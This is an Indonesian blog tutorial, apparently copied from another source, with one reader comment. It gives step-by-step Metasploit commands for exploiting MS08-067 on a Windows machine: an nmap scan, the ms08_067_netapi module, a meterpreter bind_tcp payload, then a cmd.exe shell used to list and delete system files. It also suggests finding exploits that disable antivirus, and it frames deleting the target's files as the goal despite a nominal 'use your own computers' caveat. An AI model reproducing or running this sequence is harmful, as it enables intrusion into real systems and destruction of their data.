Peralatan yg mesti dipersiapkan adalah 2 buah kompi dengan OS backtrack/ubuntu dan OS windows lalu sambungkan dengan kabel LAN, karena ini bukan belajar jahat maka kita mesti modal sendiri, jgn kompi orang lain yg di hajar,,kemudian install nmap dan metasploit di linux situ...
Langkah2nya begini nih...
Pertama-tama Kalo situ make backtrack linux langsung aja sudo apt-get install metaspoit tapi kalo situ make ubuntu, terpaksa situ add sourcelistnya backtrack di sources.listnya ubuntu situ,,nahh kalo udah keinstall sekarang coba jalanin metasploitnya, ada 3jenis tuh metasploitnya, coba dibuka aja terminal/consolenya trus ketik $msfconsole(ini buat ngejalanin metasploit yg berbasis console), $msfgui(ini buat jalanin metasploit berbasis applikasi desktop), $msfweb(ini buat jalanin metasploit yg berbasis web,jadi situ buka browser trus di addressbarnya ketik 127.0.0.1:5555 dan gambarnya kayak gini http://www.facebook.com/photo.php?fbid=1346797805113&set=a.1253181704769.29940.1686336794&ref=fbx_album )
Nah pilih aja tuh salah satunya yg menurut situ lebih enjoy yg manah..kalo saya sih lebih enakan make yg console lewat terminal maennya,,
Nih langkah nya kita make yg $msfconsole ,,yaitu lewat terminal...pertama buka terminal/console situ,,dan ketikkan $ nmap ip-target ,jadinya kayak gambar bgini:
nah liat tuh port-port di windows yg kebuka,,port 135 nya kebuka,brati awal yg aman..
selanjutnya buka dah metasploitnya ketik diterminal $ msfconsole , gambarnya kayak begini:
langkah ketiga mulailah kita, kalo mau ngeliat jenis2 exploit yg ada di metasploit ketik aja "show exploits" , tapi kalo situ udah gak sabar karena ngeliat port 135 kebuka langsung aja hajar,dengan mengetikkan
use windows/smb/ms08_067_netapi (enter)
show payload (enter, ini buat ngeliat payload2 yg ada di metasploit, pilih aja salah satu)
set payload windows/meterpreter/bind_tcp (enter)
set lhost 192.168.1.1 (enter, ini ip di kompi situ)
set rhost 192.168.1.2 (enter, ini ip kompi targetnya)
exploit (enter)kalo muncul tulisan kayak gini "Exploit completed, but no session was created" brati antivirus doi keren alias bagus,cari lagi exploit yg bisa matiin anti virus.tapi kalo yg muncul ">meterpreter" brati situ sukses, lanjut ke exploit dengan mengetikkan "execute -f cmd.exe -c -i" tanpa tanda petik, soooo
jadinya kayak gambar ini:
liat baris yg paling bawah,,,situ udah masuk ke system32 nya windows,,,skarang saatnya hajar,,,gampang kok,,gunakan aja perintah (DIR=untuk melihat file-file dan folder serta perintah DEL untuk menghapus file/folder)
coba aja ketikkan DIR, maka akan keluar nama2 file2 n folder2nya, kayak gambar ini:
udah deh kalo mau delete tinggal DEL namafile,,,windowsnya selesai deh ampe disitu,,,sekarang silahkan di patch system situ,,karena ubuntu imut, lucu dan manis bisa2 ngehajarmu dari belakang,,,
module exploit pake metasploit banyak banget disini http://www.offensive-security.com/metasploit-unleashed/ untuk babat server windows jg ada kok,,silahkan dipelajari bagi yg gemar dengan jaringan..
Sumber : Dari sini
bagus-bagus,,, bermanfaat banget.... thanks infonya....
ReplyDelete